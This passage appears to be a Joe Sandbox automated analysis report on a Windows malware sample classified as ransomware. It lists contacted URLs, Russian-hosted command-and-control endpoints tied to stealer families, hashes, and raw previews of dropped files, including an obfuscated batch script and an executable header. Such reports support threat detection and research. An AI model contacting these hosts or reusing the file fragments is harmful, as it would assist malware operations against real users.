https://github./m | 0% | Avira URL Cloud | safe
http://193.233.232.86/2% | 0% | Avira URL Cloud | safe
http://www.w3.o | 0% | Avira URL Cloud | safe
https://github.c | 0% | Avira URL Cloud | safe
http://www.winimage.com/zLibDll | 0% | Avira URL Cloud | safe
http://aia.entrust.net/evcs2-chain.p7c01 | 0% | Avira URL Cloud | safe
http://193.233.232.86/api/crazyfish.php | 100% | Avira URL Cloud | malware
http://crl.entrust.net/evcs2.crl0 | 0% | Avira URL Cloud | safe
http://195.10.205.48/ | 0% | Avira URL Cloud | safe
http://www.entrust.net/rpa0 | 0% | Avira URL Cloud | safe
Name | IP | Active | Malicious | Antivirus Detection | Reputation
aSrgKXZxBg.aSrgKXZxBg | unknown | unknown | false | - | unknown
    Name | Source | Malicious | Antivirus Detection | Reputation
    http://crl.entrust.net/g2ca.crl0 | wWk9NkXYcL.exe | false | Avira URL Cloud: safe | unknown
    https://github.-1/ | wWk9NkXYcL.exe | false | Avira URL Cloud: safe | unknown
    http://193.233.232.86/api/crazyfish.phpdll | Element.pif, 00000015.00000002.2502705369.0000021925E58000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
    http://ocsp.entrust.net02 | wWk9NkXYcL.exe | false | Avira URL Cloud: safe | unknown
    https://github.com | wWk9NkXYcL.exe | false | Avira URL Cloud: safe | unknown
    http://ocsp.entrust.net01 | wWk9NkXYcL.exe | false | Avira URL Cloud: safe | unknown
    http://www.entrust.net/rpa03 | wWk9NkXYcL.exe | false | Avira URL Cloud: safe | unknown
    http://ocsp.entrust.net00 | wWk9NkXYcL.exe | false | Avira URL Cloud: safe | unknown
    https://www.youtube.$ | wWk9NkXYcL.exe | false | Avira URL Cloud: safe | unknown
    https://github.-1 | wWk9NkXYcL.exe | false | Avira URL Cloud: safe | unknown
    https://github.co( | wWk9NkXYcL.exe | false | Avira URL Cloud: safe | unknown
    https://fb.me/%3 | wWk9NkXYcL.exe | false | Avira URL Cloud: safe | unknown
    http://www.autoitscript.com/autoit3/X | Element.pif, 00000011.00000000.1272166025.00007FF6C5964000.00000002.00000001.01000000.00000006.sdmp, Element.pif, 00000015.00000002.2504308481.00007FF6C5964000.00000002.00000001.01000000.00000006.sdmp, Rick.0.dr, Element.pif.2.dr | false | Avira URL Cloud: safe | unknown
    http://195.10.205.48/:% | Element.pif, 00000015.00000002.2502705369.0000021925E58000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
    http://nsis.sf.net/NSIS_ErrorError | wWk9NkXYcL.exe | false | URL Reputation: safe | unknown
    http://www.autoitscript.com/autoit3/ | Element.pif | false | Avira URL Cloud: safe | unknown
    https://www.autoitscript.com/autoit3/ | wWk9NkXYcL.exe, 00000000.00000002.1252803341.000000000041E000.00000004.00000001.01000000.00000003.sdmp, Rick.0.dr, Element.pif.2.dr | false | Avira URL Cloud: safe | unknown
    http://195.10.205.48/api/crazyfish.php | Element.pif, 00000015.00000002.2502705369.0000021925E38000.00000004.00000020.00020000.00000000.sdmp, Element.pif, 00000015.00000002.2502705369.0000021925E4E000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
    http://195.10.205.48/api/crazyfish.php.A | Element.pif, 00000015.00000002.2502705369.0000021925E38000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
    https://github.2& | wWk9NkXYcL.exe | false | Avira URL Cloud: safe | unknown
    https://ipgeolocation.io/ | Element.pif | false | Avira URL Cloud: safe | unknown
    https://github.2 | wWk9NkXYcL.exe | false | Avira URL Cloud: safe | unknown
    https://github.2C | wWk9NkXYcL.exe | false | Avira URL Cloud: safe | unknown
    https://github.3 | wWk9NkXYcL.exe | false | Avira URL Cloud: safe | unknown
    http://crl.entrust.net/csbr1.crl0 | wWk9NkXYcL.exe | false | Avira URL Cloud: safe | unknown
    https://github.co.L | wWk9NkXYcL.exe | false | Avira URL Cloud: safe | unknown
    https://github.- | wWk9NkXYcL.exe | false | Avira URL Cloud: safe | unknown
    https://mdn.io//1 | wWk9NkXYcL.exe | false | Avira URL Cloud: safe | unknown
    https://github./ | wWk9NkXYcL.exe | false | Avira URL Cloud: safe | unknown
    https://ipinfo.io/ | Element.pif | false | Avira URL Cloud: safe | unknown
    https://github.com/ | wWk9NkXYcL.exe | false | Avira URL Cloud: safe | unknown
    https://ipinfo.io/https://ipgeolocation.io/0 | Element.pif, 00000015.00000002.2501826641.0000021925C50000.00000040.00000400.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
    http://193.233.232.86/ | Element.pif, 00000015.00000002.2502705369.0000021925E58000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
    https://github.com4 | wWk9NkXYcL.exe | false | Avira URL Cloud: safe | unknown
    http://193.233.232.86:80/api/crazyfish.php1 | Element.pif, 00000015.00000002.2502705369.0000021925E61000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
    http://www.w3.o | wWk9NkXYcL.exe | false | Avira URL Cloud: safe | unknown
    http://193.233.232.86/2% | Element.pif, 00000015.00000002.2502705369.0000021925E58000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
    http://www.winimage.com/zLibDll | Element.pif, 00000015.00000002.2501826641.0000021925C50000.00000040.00000400.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
    https://github.c | wWk9NkXYcL.exe | false | Avira URL Cloud: safe | unknown
    https://github./m | wWk9NkXYcL.exe | false | Avira URL Cloud: safe | unknown
    http://aia.entrust.net/evcs2-chain.p7c01 | wWk9NkXYcL.exe | false | Avira URL Cloud: safe | unknown
    http://193.233.232.86/api/crazyfish.php | Element.pif, 00000015.00000002.2502705369.0000021925E58000.00000004.00000020.00020000.00000000.sdmp, Element.pif, 00000015.00000002.2502705369.0000021925EA2000.00000004.00000020.00020000.00000000.sdmp, Element.pif, 00000015.00000002.2502705369.0000021925E8E000.00000004.00000020.00020000.00000000.sdmp, Element.pif, 00000015.00000002.2502705369.0000021925E78000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
    http://crl.entrust.net/evcs2.crl0 | wWk9NkXYcL.exe | false | Avira URL Cloud: safe | unknown
    http://www.entrust.net/rpa0 | wWk9NkXYcL.exe | false | Avira URL Cloud: safe | unknown
    http://195.10.205.48/ | Element.pif, 00000015.00000002.2502705369.0000021925E58000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
    IP | Domain | Country | ASN | ASN Name | Malicious
    193.233.232.86 | unknown | Russian Federation | 2895 | FREE-NET-ASFREEnetEU | true
    195.10.205.48 | unknown | Russian Federation | 35813 | TSSCOM-ASRU | true
    Joe Sandbox version:40.0.0 Tourmaline
    Analysis ID:1510359
    Start date and time:2024-09-12 21:25:11 +02:00
    Joe Sandbox product:CloudBasic
    Overall analysis duration:0h 6m 18s
    Hypervisor based Inspection enabled:false
    Report type:full
    Cookbook file name:default.jbs
    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
    Number of analysed new started processes analysed:29
    Number of new started drivers analysed:0
    Number of existing processes analysed:0
    Number of existing drivers analysed:0
    Number of injected processes analysed:0
    Technologies:
    • HCA enabled
    • EGA enabled
    • AMSI enabled
    Analysis Mode:default
    Analysis stop reason:Timeout
    Sample name:wWk9NkXYcL.exe
    renamed because original name is a hash value
    Original Sample Name:3a1ccc44a0aa6f397c3b2eacf6d4c526.exe
    Detection:MAL
    Classification:mal100.rans.evad.winEXE@25/34@1/2
    EGA Information:
    • Successful, ratio: 100%
    HCA Information:
    • Successful, ratio: 83%
    • Number of executed functions: 27
    • Number of non-executed functions: 245
    Cookbook Comments:
    • Found application associated with file extension: .exe
    • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, SgrmBroker.exe, conhost.exe, svchost.exe
    • Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, ctldl.windowsupdate.com, time.windows.com, fe3cr.delivery.mp.microsoft.com
    • Not all processes where analyzed, report is missing behavior information
    • Report size getting too big, too many NtAllocateVirtualMemory calls found.
    • Report size getting too big, too many NtOpenKeyEx calls found.
    • Report size getting too big, too many NtQueryValueKey calls found.
    • VT rate limit hit for: wWk9NkXYcL.exe
    Time | Type | Description
    15:26:05 | API Interceptor | 1x Sleep call for process: wWk9NkXYcL.exe modified
    15:26:08 | API Interceptor | 1x Sleep call for process: Element.pif modified
    Match | Associated Sample Name / URL | Detection | Threat Name | Context
    193.233.232.86
    • 7CTH165fQv.exe | malicious | Latrodectus | 193.233.232.86/api/twofish.php
    • 3QKcKCEzYP.exe | malicious | LummaC, Djvu, Go Injector, LummaC Stealer, Neoreklami, Stealc, SystemBC | 193.233.232.86/api/twofish.php
    195.10.205.48
    • gHPYUEh253.exe | malicious | Djvu, Neoreklami, Stealc, Vidar, Xmrig | 195.10.205.48/api/twofish.php
    • kqS23MOytx.exe | malicious | Socks5Systemz, Stealc, Vidar, XWorm, Xmrig | 195.10.205.48/api/twofish.php
    • Z66MsXpleT.exe | malicious | LummaC, Stealc, Vidar | 195.10.205.48/api/twofish.php
    • eSLlhErJ0q.exe | malicious | LummaC, Stealc, Vidar | 195.10.205.48/api/twofish.php
    • iBO7gzlZr3.exe | malicious | LummaC | 195.10.205.48/api/twofish.php
    No context
    Match | Associated Sample Name / URL | Detection | Threat Name | Context
    TSSCOM-ASRU
    • SecuriteInfo.com.Trojan.Siggen29.24758.13221.7276.exe | malicious | Xmrig | 195.10.205.253
    • gHPYUEh253.exe | malicious | Djvu, Neoreklami, Stealc, Vidar, Xmrig | 195.10.205.48
    • kqS23MOytx.exe | malicious | Socks5Systemz, Stealc, Vidar, XWorm, Xmrig | 195.10.205.48
    • Z66MsXpleT.exe | malicious | LummaC, Stealc, Vidar | 195.10.205.48
    • eSLlhErJ0q.exe | malicious | LummaC, Stealc, Vidar | 195.10.205.48
    • iBO7gzlZr3.exe | malicious | LummaC | 195.10.205.48
    • ORDERDATASHEET#PO8738763.scr.exe | malicious | AgentTesla, RedLine, SugarDump, XWorm | 195.10.205.94
    • RFQ 10046335 PO 4502042346 PR 11148099 411128.exe | malicious | RedLine | 195.10.205.102
    • sWXyzk4Kv3.exe | malicious | AsyncRAT | 195.10.205.90
    • SecuriteInfo.com.Win32.TrojanX-gen.9663.10822.exe | malicious | Xmrig | 195.10.205.162
    FREE-NET-ASFREEnetEU
    • file.exe | malicious | LummaC, Clipboard Hijacker, Cryptbot, LummaC Stealer, PureLog Stealer, RedLine, Stealc | 147.45.44.104
    • pdf.js | malicious | SmokeLoader | 147.45.125.198
    • 09.09.2024p.pdf.js | malicious | SmokeLoader | 147.45.125.198
    • file.exe | malicious | LummaC, Vidar | 147.45.126.10
    • file.exe | malicious | LummaC, Clipboard Hijacker, Cryptbot, LummaC Stealer, PureLog Stealer, RedLine, Socks5Systemz | 147.45.126.10
    • file.exe | malicious | Vidar | 147.45.126.10
    • file.exe | malicious | LummaC, Vidar | 147.45.126.10
    • file.exe | malicious | LummaC, Stealc, Vidar | 147.45.126.10
    • file.exe | malicious | LummaC, Vidar | 147.45.126.10
    • file.exe | malicious | LummaC, Vidar | 147.45.126.10
    No context
    Match | Associated Sample Name / URL | Detection | Threat Name
    C:\Users\user\AppData\Local\Temp\473638\Element.pif
    • eSLlhErJ0q.exe | malicious | LummaC, Stealc, Vidar
    • 7CTH165fQv.exe | malicious | Latrodectus
    • Fj8bSgJTob.exe | malicious | Unknown
    • Fj8bSgJTob.exe | malicious | Unknown
    • SecuriteInfo.com.FileRepMalware.2106.24143.exe | malicious | Xmrig
              Process:C:\Windows\SysWOW64\cmd.exe
              File Type:ASCII text, with very long lines (841), with CRLF line terminators
              Category:dropped
              Size (bytes):8753
              Entropy (8bit):5.112168319183873
              Encrypted:false
              SSDEEP:192:/YjisELs0/sDOykocrtURbjM9hC4mJJSKz4wKL3RjtHH016:JsELRsfortQbjKhQJJDz6LBhHH0M
              MD5:679A660E6448E2D327012672F96E392B
              SHA1:D076AF425395161DAAC0093BD2AC3224BF2C0D2C
              SHA-256:F0C7D541CC3FAECBE583663B7F7EAE6379DF06024E1B7AD6E764A87446406469
              SHA-512:844CB059456118947493905C19730BD09C87AB038FA19012D6E34F942B9B472042E757DA05C5BC8A254E79F6C376CB267F0897300CB40AD0716BAFF7C759BFFB
              Malicious:false
              Preview:Set Pediatric=x..IwDisorder Lands Enzyme Dedicated Executed Cook ..ZBExperiences Ruling Org Bend ..itqJapanese ..xNConcepts Dell Noise Adverse Broadcasting Dat Days ..bfEjExposed Ozone Filters ..bwfNasty Knows Rural Imagination Length Chorus Bibliographic Nikon Mat ..Set Mapping=e..GetFTamil Emission ..ndLamps Flags Shelter Reviewing ..LuFIntegrate Repeat New Rental ..EFriTopic Repository Recipe ..LgCCreatures Mood Relationship Closest Introduce Doug Christ ..tKPuerto Systems Hp Upc ..gTbRt Mia Dover Curtis ..jcENBerlin Jokes Sole Wire Threesome Alabama Opponents Effective ..dEKelkoo Tip Points Hot Free ..QjkSomeone Css Washer Permitted Enrollment Likelihood Colombia Cyprus ..Set Summit=l..jFVTheorem Ls Tracker Susan Worry Musical Buys Rendering ..rzMileage Sustainable Turkish Salary Machine ..jHFDennis ..yyebAnytime ..fNIssn Vary Thinking Founded Define ..KnMove Understand War Nut Flu University Searches ..GzhgEdges Confidentiality Ridge Switzerland Ltd Pipes Realty Comes ..rPqxTcp Cn
              Process:C:\Windows\SysWOW64\cmd.exe
              File Type:PE32+ executable (GUI) x86-64, for MS Windows
              Category:modified
              Size (bytes):1065128
              Entropy (8bit):6.43820773264071
              Encrypted:false
              SSDEEP:24576:SAwciuvaj8l4LEWumcKYB5Wek2vY+BYssmNolbmmPmJ4Ve+aaWBS:SALTBaLETmcKYB5WH2AwjsLbmmPmJ4Vt
              MD5:C63860691927D62432750013B5A20F5F
              SHA1:03678170AADF6BAB2AC2B742F5EA2FD1B11FECA3
              SHA-256:69D2F1718EA284829DDF8C1A0B39742AE59F2F21F152A664BAA01940EF43E353
              SHA-512:3357CB6468C15A10D5E3F1912349D7AF180F7BD4C83D7B0FD1A719A0422E90D52BE34D9583C99ABECCDB5337595B292A2AA025727895565F3A6432CAB46148DE
              Malicious:true
              Antivirus:
              • Antivirus: ReversingLabs, Detection: 0%
              Joe Sandbox View:
              • Filename: eSLlhErJ0q.exe, Detection: malicious, Browse
              • Filename: 7CTH165fQv.exe, Detection: malicious, Browse
              • Filename: Fj8bSgJTob.exe, Detection: malicious, Browse
              • Filename: Fj8bSgJTob.exe, Detection: malicious, Browse
              • Filename: SecuriteInfo.com.FileRepMalware.2106.24143.exe, Detection: malicious, Browse
              Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$........1.q.P.".P.".P."y..".P."y.."QP."y..".P."S.1".P.".8.#.P.".8.#.P.".8.#.P.".(u".P.".(q".P.".(e".P.".P.".R."^9.#.P."^9.#.P."^9.".P.".Pa".P."^9.#.P."Rich.P."........PE..d......^.........."......:...(.......R.........@.........................................`...@...............@..............................[..|.......h....@..To...$..........t....p......................X...(...0p...............P..8............................text....9.......:.................. ..`.rdata...A...P...B...>..............@..@.data...P........P..................@....pdata..To...@...p..................@..@.rsrc...h............@..............@..@.reloc..t...........................@..B................................................................................................................................................................................................................
              Process:C:\Windows\SysWOW64\cmd.exe
              File Type:data
              Category:dropped
              Size (bytes):2165308
              Entropy (8bit):7.999912272401388
              Encrypted:true
              SSDEEP:49152:w81uy9Ge4xBxx4fo8/gQy4D2Zm6sazYfidgJ09NTHti+nhhogtnlmwG:T1uVPHb4foPQy4i2uNTHE+hWcn8d
              MD5:90E5FA4E6137A05C9714BCA56460A7D4
              SHA1:1092E3F18D073AE57DB628D842F3853675494864
              SHA-256:6C2114AA50E823BD834589EB9020DD9A50C35BA527B15E076D51E9BCE8476C3F
              SHA-512:3CD2D72A14617CBF7D936C8723CD140F8F0EDBE437420AFFEC40986783F1AD7EA2F18B9B38C58B45D01E26BB19D6E6FE1CB73092DF36D58E00559D305B868FEA
              Malicious:true
              Preview:../#...I.........0_~.Q......].BP....s..i..v....C.......73..&!.....`.M.v.V.D;...MQ....v.w?wZ.He....D.S..I._*@..z.m.D....B.w.6./e.i@ux....8..Ka.G..&t!...,....-..9....Zt...8O.]..9......Iv...K.......-..o..........i...|....D...7BfVV` .UmlT4..q>..5..;J5....0$..A2^....3Nv(...c..=O.1..!x. ..<H5AC.>.......V....!....:.=:Hbeq.-.F.u$%&..._.H."...2.af,.K(..VO.`...2..i.I23!!.).OEW>....)..yGMK.>...... .4..*Zy...>!...`e.....".+1....u.W 1....@D..Y.h.f)...P.~G.H.}Qn..$8..f.....D.b..#..7.....t.T..1L.0I7....S.79....Z...1.{.q.I..;.<......6LU.z..@.g/..v ......S..&....o..8.......}=..../...~.R.Sw.Y..8...."..]......,.qM.@>..!@...>....D+h.w.sZ+.a<..'.(....1.........&.B....g..?.....v<.J..:...d:z.; ..c.j7Q..|r........4......hh.:$..6k"..?..5}EFg.o...P..Wa.A.kBMo..$f....8...IJ....i.4..{.-...x.;..bJt..<Q....nP..].3;.....,......s....~...A.:.t...lc..d...kR......B../VX.$.`.".>.}...).>..q.L..xq....3mBO?.y..Hd.Gu....5.....> I.Y.7...I..|.k..5(+..@...Q.....y..W....D.
              Process:C:\Users\user\Desktop\wWk9NkXYcL.exe
              File Type:data
              Category:dropped
              Size (bytes):79872
              Entropy (8bit):7.997675665711239
              Encrypted:true
              SSDEEP:1536:c7J33hd/Xu84+AoSmnbzOYunXgxUFKIgeIlxYJt+iS4Z:Yl37/+8imbzO3nQxUDgewxyt+i
              MD5:CDE2F7038FA3E2789517A6D7F0127E67
              SHA1:C0B294730005E5A0039445ED086959F3042DDAFE
              SHA-256:4EB1B91A3194ADEB11C363DF098B87D9EC4D0D2BA88B3D4FE16730C6ECEAEFBF
              SHA-512:2710A9FB0B046D53AD27667AD7B2022C0D35042610ABAAAFD32635094057D43420B7BA0A077534C334C85038FAD1D3D6285D69B845E6BC73255F983FC3306F5F
              Malicious:true
              Preview:&7..3.|..I.....D...P....#b..4.6...........w\.0....E.u.>..p.p]..".9.U....x.<......"....vEE.6by..e...T...m..%E.....Am...l.w....S.oKL.V.h..pM...^.Q.N.=......(.^v...\.e......u.{.#..>.<....b.K?...3q.../..1.......i&Z..8....8.j.%H.nS.y.Q..."J.A.O...H.!.C.6..%..#t...:...3.i*...yV.)...eN..S.....(7..h...Dm.U...iw.G..4D...}H...7.7.Q.Y..&,!c|.....`>|..Y..v....F.0..|....... 7<..%.&}.O.....F.g.t..%...a.d.'./...._C.Y2...0g...{4.....S.Y'.....x.....#.8A..7.b....Y...y.{l7l....*)....7.O6+0..8.. ...G..1}E..J.SH'..........0.G.....Z....?. .?JN.."..a.b.p...b....[pW..G.b....".;Mp...]../;...u!..[...UvG(th.`.."..|....I.l9...%.....p..FFy~.;.....P.k.X..0`.M|Xp...i'1>. t...X..0.O0.)6....i...&e....e.....Al.:.{\&..D..#$-...E....Z.v.......z..%..'.....U..K*.A]..{..,..U.6J.2....E.+B.a....Z........P.!.[V#q.k.....`QwQ.'..)..6.Et...v../.....l.7"R=..i.........l...c..+.l(.p`..@9V=D7....zm..U}#..\.........n...O...'B&a."..E].5.........<...xT..%.....-..S$..p..b.BFr..k..Q.....{
              Process:C:\Users\user\Desktop\wWk9NkXYcL.exe
              File Type:data
              Category:dropped
              Size (bytes):78848
              Entropy (8bit):7.99776283032043
              Encrypted:true
              SSDEEP:1536:2QC9JS8Wyxz/oYh9MczXmHWwfv+IVsxTfKN4VRUf2RMnq03csQP:2k8Wyge9zXmHxHf8fzofmMq0sFP
              MD5:8A4B87534399E48007B9F8B94B57D4FD
              SHA1:43E5AA90B4929C5C3F4DE023C64B45DFC9F9B98B
              SHA-256:99DC8AAD20ACDEC986A8D6060DDBE8E4E5218272BA5A209083184E9E2533FE34
              SHA-512:23F344672A65531DC60509DB871F8BECE28B53B48B27E2F33E1768E83C4627EC05D241C7AB40E2DE54B480050DD2D27A5607C7EDACC0B1F2432AA65CE7C64630
              Malicious:true
              Preview:)..Pu.AU....F>.....l.N.._..r... X9A[*..m..2V.s(....g.........$t..X.|.F..Ai6.5.......Y..gk...6.D./...}..sRO......^.~..:'...^...z._....mI t%8....$x...Y2.....b.i..X&[.yh..=@x=.&..5.K. D.f.>)_.R\.=.Zs.Z ....3...Y...Em..<V.....zzr.B.M..L.&.^.(=..;.#.Zz'.}9...1.(K~.e.....#._.._.K...).jZ.Q!.zOn.Z..vgf.$..S...T.}.>axx.6g......(.q.t.u_.............w........EMR.|..._b...C.u...F...Q.lj.5V~..i..........$.....Q.@T\.c!..W..7z.x.._.<...r....%x274qL..O......i.L.W.?.s....DK.Y(..?.a....l.^...Vg.Y.s.a.!R.D2]..|.9.......x.x.\.^^..C....|yf.ruaJbiZ*...lU...D.ee....3rYY.\...$7.a.HU..u..../..;.....B....|..6H..(.....zs.).gt."..G.%..<..p..+}.%ESM.$.{h.Q..w..,....H1..v..<.H&.z.............U.x.=.u(PCt.`d..JS...H..m!..U...w..`bL...e54.G.).7..'.N'...|`e.Y.y(tfh..z..`>..Q...:;..xzn....@[.:.3l....0..h.(t.L...8V.......f..A....Q.;.+..i.7.g.g...#.....V....}.N..ga..:...!b........FZ.....{....;/..O'/...>c.G...#.:..s._.,(.m5...R...e.N....{..6.W....=....?.1.Q....-&$,".'....,...../
              Process:C:\Users\user\Desktop\wWk9NkXYcL.exe
              File Type:data
              Category:dropped
              Size (bytes):98304
              Entropy (8bit):7.99815557602569
              Encrypted:true
              SSDEEP:1536:dOWP6O5A590lucBfq6Hvn80h15xjW3ktc3XkiR8Cw/WC8AxVCTspUjjIJs0iaVy:dOS5A50Bfq+v8G15Yktc3XkiCCwHVCT9
              MD5:2B56AEE801527E06A5EE1C59EC202CA0
              SHA1:BC7015AAB830700D5FD4A19A628417193082FDAC
              SHA-256:A267EED8EF05A62C3A0EC8829D1ADE778C7942AE91DA390FD4DC46373583F730
              SHA-512:F12934985F41B801CC252B6C9597339E80DFA613F3A7DFB81FE0A82E8C7590E6E022700E18F5EE4D9B756017DF8F184030D85F80B207D2EC3B8EFDC4D56CD366
              Malicious:true
              Preview:D..}._..N...*...=...%...\a.`..\.*.._}..'y.3.>..........o.93.W\k..h._w$UmC.._.B.].|*M]V../!..a..B1....h.f.G=....c........F3...'.....5..5.x#.`E.K.3.......v.p.....Z..#5=h4.8..V.%.3d......v$.y.......\..8.i....zru...~.....rq_K..Uy6._5`Z GZ....Y.iY......wt.e.O1v%..Z.HLA.C.'[Ao....... ..jJ..z..y......O.Q.\`.b.3.7.....q.*........c.F..O.f.".....>.`.).{.....X.......k...D".FUj...u..c.y..(..f.kR.bnl.....(%.L..O......<.....V.z..o.\..5K... ......#.;=7o.j. ..>D..)&.sR._../T..k..Xh../.....T\H..l.-.Mdh(..1rfo.i...&.Q'.Fv..i.1A\.ek..S..?h..A.7.+...{.b{..P]C...$?r.E?..~'...Q.s.y..MF9..3._.N.M.#R...v.V.j..d.....*.....f-.;..k.LE..f..W..e...=.'.a).l..N.R/...."../k...^...I.k...s...._pq.f.16f..e. .Jf..B.g.FG...S...(p..=..>..j$.9.X.1..;u...'..).|..|&...G......:.re..........N^.e...q.4qN ..rrw:.u..f.h.'jU...8.........@\..O%"dG..=.......` %x..c...J[.?Z.E.........7P .lk-.A...n...:c......o\xR!.........N.#..)..k.<4.=..p.x"...s..P6.......A3...V./g...'..LT...{......1
              Process:C:\Users\user\Desktop\wWk9NkXYcL.exe
              File Type:data
              Category:dropped
              Size (bytes):99328
              Entropy (8bit):7.9982088197359325
              Encrypted:true
              SSDEEP:3072:WBcCViEN5ytzKb28P7zeJ8L54CZpwFBWrUI:WBcQcG2LJ8L5dwFB1I
              MD5:D3D39AE5C5F89A1DAFB8E7FD2DB7A388
              SHA1:EB5D3EB4093D647240846C2211DE60EA710C70DD
              SHA-256:E51EC6266337726224A9E53607C02F39E002FB42A7ABD81E9326F4767A315292
              SHA-512:DFCBD29F7FE8EB901DC7FE0D40B646B33A6CFFDDE41907A8DF3F4CBAE22309AF54A269B261311B760E3D4F4A46254E86BEC9ABFD8A601EA788ABBD322F475706
              Malicious:true
              Preview:.....br.ZY......j..rY.....r.L@._..1.............Nyv..un.......N.w.*.Y.5..a.yyg.,.M..8.r.O....B..w...{.,.*.U..Ej...&..-d9(`.Y..?8.V...j.g.-~J.../1+1....'.(w...S0......C.....D#.$]d.e....!./}..Z{'.=...V..=(Z...7...B...k..2J.4M...J..?6.b?...=.P.Y...T....[I.W\..m.k.2z....3.....QC.6....s2.E...M.....#.6....EEP....6.....wt.....N.v.......OX..L.H..A..:...L...h.$.......df..h._6G...rg..........G..(..l..-.....{Ak.p...n.f..c....#$W|..rS..Vh.-GY.I.&=....K..G.p4(.B.H.r.....dc..'.z..!.B........s.#..x5......@...;....... .[...J.^....<.;..x.+...g..d...yg}.f%.r.'%..y..oO!5.,f.P....kd3y...-.}......g..{..........-....]...C.'b.\...e6.*.<a..~.DW'q.s..p=VSc.73.... ..9.6........n..&.v....Z*Sx.!...e......;....2..=...Bq7.n...R..:..m...._6!......#...Sq[b.m.+"".=vR{^_)..0..X.6b.. c.x.........d.'z.....{..D.:.H.J?vH)0.8...Ff....Q{6..zeZ.}B3Lx..,ez.."...+_./......L....2."?.kev...8.Y.^.Y_..^... .{{.EcK...|%.r..%/wF0...e#<H..5.5P\...2...;..i.:...%^..C..$.....Y.g
              Process:C:\Users\user\Desktop\wWk9NkXYcL.exe
              File Type:OpenPGP Public Key
              Category:dropped
              Size (bytes):81920
              Entropy (8bit):7.9976456111907925
              Encrypted:true
              SSDEEP:1536:szOmTPyRj28ZI5MlnJYP973eF8mIWR8jN4flP/ba:szf2p2iI5M1JYPt3dWR854flba
              MD5:1B82BFA2A5BAC845E80F8ECEF5422968
              SHA1:924FA660F63FC7F695C35614FDB4C991BBAD83B9
              SHA-256:5D65ED3F78CD2A58EEA4B787BCD2C2B360D092E42B66D7AE8BF9D40B2D8E3E29
              SHA-512:969B681C000E047DCDA54E5874F2FCA730B3BACBB8C8140166A2223070D7C2E606D261C27334B70C9654A6F8D6C53CD7661DE04288335ADF7CB4A171B8235FC8
              Malicious:true
              Preview:.p.04..Qk....S.J7....{<..#.`...9......^...y.D....;.pzt.........,m.y..<b..2Z~*/82...18....:.T....~r.,..m.J...9...8......cSi^...Z...dXG.[YU...R.`9........3xSw.W&{.."...+.{p. piU.g..;8.............(|gD._].uW...X.........y..b}.t)._'.....~..?..Z.60....G...36.......L.`x..y>.p>...E.......V.....887.Kmw.....H. ...P.2.1..>..`.......t:CK.g...p..,...R.9....=....t..'..Q7..3`.K..J.....l.l....-t.,...=.|..H$...}gu.&...E..-v.-p\.Q.h......"cz#..*d.E7..lO.k.R.F.......y..J....q.x<L.6O....i8.[..zFNAP.]_d..S.%.#W..-<..I.2./..o.&.J.1..}9;ah.........;....}...8..B.6.Y.P..n~.U..".5..Js.vG]m.).lX.?..?R.W7....L...S.:)+c.u<.7O.Bd.N8S...r...W....T....=d.a.O.N.P..3$'...3t.6..$.3Xw.,V...M^....j.M.G.gV.&^..+IV;S..b1J.9c.y"OY.z..&C...M.^t..a..i>.h~..+......9wD8.v.......[.&....^.%.....F......da.M.cvu...zh...eV.K.i.X']9.,....^...$R....M.x..zL=).....Z.O.#m5.,..J.....(6.m.Cz...Ak}............U.g.U.!'.F...q6.z...a9....~...k ....-]TQ).jw..>._.1..,...p..t..........Fi.^....J.S
              Process:C:\Users\user\Desktop\wWk9NkXYcL.exe
              File Type:COM executable for DOS
              Category:dropped
              Size (bytes):88064
              Entropy (8bit):7.997813932172339
              Encrypted:true
              SSDEEP:1536:RvUvXE+1sOsUTwun8bOfXoT1eNWymESPwdgqyJD9fvOXoCTtDq1C0SOadtq:WvR1TFnVfXoT0MHPwdgqyJD9nkTaXSOr
              MD5:84CB1247F586ACF910335852D89296C8
              SHA1:6F09511B2A50DC3174314435187371CA0CD58EF1
              SHA-256:6D9D9C1AA649D941CD49A9AB6F496DAE66809685690E905F554173E3B6E51CF0
              SHA-512:FFE56EE6932E25B7C22BD897D80AED8417058C8B97B283EC058F1B4F33B20CECBF01195872F97C481808E95CA65C812E048A535F4C8FEB2672A5EA072566C182
              Malicious:true
              Antivirus:
              • Antivirus: ReversingLabs, Detection: 0%
              Preview:..IZ.|...t....W....e.q*.'.Ijf.o..@Y.ZS..o..DKL.P..T.|...\.......w>..,?..7#....&.aaa.?t.7....\..=..%..g(...2.....NY.:..u...8.o|..M.M...a.>.7....HIU.f(........t.i.^BJ^Z3..+5..GB.J..#.....N...H.........._@&~...%nm.....].... .^....(jk.j..;......F...Q:V...,.%.'M.+i..j#`.at.Xl...dB.6D.K.eK4&~].....FN..e0X.x....xu..$...a.a......._..]..HA.{..hw.a. .....zKf.W...#.....K....z..e.!...^.@.OO~....2.l.rJE.,`.y...d.oB.......O.....p......s e..<.{l...."2,BK1Y...<..jCp.;,..|...+...\q3{.44.#...U.......U:.R.x..E.qe.H.m.7.+...T...i&....,........n...8./.*.sH...s>..<...7ucZ...B..mR.?`..v.7Z...........`......'...F...,.YzBFx..\...L..._.x..........a:l.P..S...}ZF.....W...{5\B..s..D.......n.....9W..p'py.i.T".....|..8.N&6..]..{.b.o.f. 